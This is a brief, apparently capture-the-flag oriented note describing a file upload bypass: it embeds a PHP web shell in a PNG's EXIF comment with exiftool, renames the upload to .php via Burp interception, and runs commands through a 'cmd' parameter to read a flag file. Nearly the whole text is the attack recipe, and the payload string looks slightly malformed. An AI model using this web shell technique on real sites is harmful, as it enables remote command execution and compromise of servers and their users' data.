whenever i see a file upload bypass i usually use a png payload since it always works
1. ctrl + u to check source you will see a commented line /upload.php and all of the uploaded file will go into /uploads
2. make a payload with exiftool image.png -Comment='"; system($_GET['cmd']); ?>'
3. upload the file intercept with burp and change the file extension to .php and remove some png data
4. image.php?cmd=cat ../flag.txt